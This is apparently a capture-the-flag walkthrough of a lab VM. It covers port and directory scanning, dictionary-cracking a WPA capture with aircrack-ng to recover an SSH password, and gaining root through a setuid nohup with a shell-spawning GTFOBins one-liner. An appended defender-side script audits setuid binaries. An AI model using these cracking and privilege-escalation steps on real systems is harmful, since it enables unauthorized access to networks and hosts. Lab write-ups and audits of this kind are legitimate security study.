Netdiscover
sudo netdiscover
192.168.0.23

rustscan
rustscan -a 192.168.0.23
Output:

Port 80
gobuster dir -u http://192.168.0.23 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt
Output:

http://192.168.0.23/robots.txt

On some pages I have this error:

In the htaccess file I have this message. I think it's a Joomla server.
http://192.168.0.23/htaccess.txt
End - Joomla! core SEF Section.
Port 9000
I can use gobuster on this page, which returns error 500 (Internal Server Error), by passing the --wildcard switch so it keeps going.
gobuster dir -u http://192.168.0.23:9000 -w Documents/wordlist/directory-list-2.3-medium.txt -x html,php,txt --wildcard
Output:

But:

Nothing interesting.
Port 8999
It's useless to run the gobuster scan on this web server because we already have the directories. It's like an Index of / page.

It's a webfs/1.21 server hosting a cap file.
I have to open it with Wireshark.
WPA-01.cap

This is a capture of a wireless stream, with the SSID: dlink
I have to use aircrack-ng to recover the password from the cap file with a dictionary attack.
aircrack-ng -w Documents/wordlist/rockyou.txt /home/peanutstick/Downloads/WPA-01.cap

The password for the SSID dlink is p4ssword.
SSH
I can use the user dlink to login via SSH.
ssh dlink@192.168.0.23
Enum

Can’t check the .bash_history.
With lse.sh:

There is nothing in /usr/bin/TryHarder!
Uncommon setuid
https://gtfobins.github.io/gtfobins/nohup/

I can't use the command with sudo.
/usr/bin/nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"

I’m root.
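From the defender's side, the setuid nohup that ends this box is exactly what a periodic setuid audit should surface. The script below is an added example, not part of the writeup or of lse.sh: it lists setuid/setgid files and flags any that are absent from an expected baseline. The BASELINE list is a constructed assumption for a Debian-like host, and the function names are my own.

```shell
#!/bin/sh
# Added defender-side audit (not from the original writeup): list every
# setuid/setgid regular file on a host and flag those missing from an
# expected baseline, so an "uncommon setuid" binary such as nohup is
# caught before it can be abused. Assumes POSIX sh and find(1).

# Constructed baseline of setuid programs normally expected on a Debian-like
# host (assumption; replace with the host's real package inventory).
BASELINE="/usr/bin/sudo
/usr/bin/passwd
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd"

# find_setuid DIR: print each setuid or setgid regular file under DIR,
# staying on one filesystem and ignoring unreadable directories.
find_setuid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# flag_unexpected: read paths on stdin and print those absent from BASELINE.
# Whole-line matching keeps /usr/bin/su from being taken as /usr/bin/sudo.
flag_unexpected() {
    while IFS= read -r path; do
        if ! printf '%s\n' "$BASELINE" | grep -Fxq -- "$path"; then
            printf '%s\n' "$path"
        fi
    done
}

# audit DIR: run the full pipeline; exit status 1 when anything unexpected
# turns up, so it can gate a cron job or a CI check.
audit() {
    found=$(find_setuid "$1" | flag_unexpected)
    if [ -z "$found" ]; then
        return 0
    fi
    printf 'Unexpected setuid/setgid binaries under %s:\n%s\n' "$1" "$found"
    return 1
}

# Only scan when AUDIT_ROOT is set, e.g.: AUDIT_ROOT=/ sh setuid_audit.sh
if [ -n "${AUDIT_ROOT:-}" ]; then
    audit "$AUDIT_ROOT"
fi
```

On this box it would report /usr/bin/nohup as unexpected, which is the finding lse.sh labels "Uncommon setuid".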
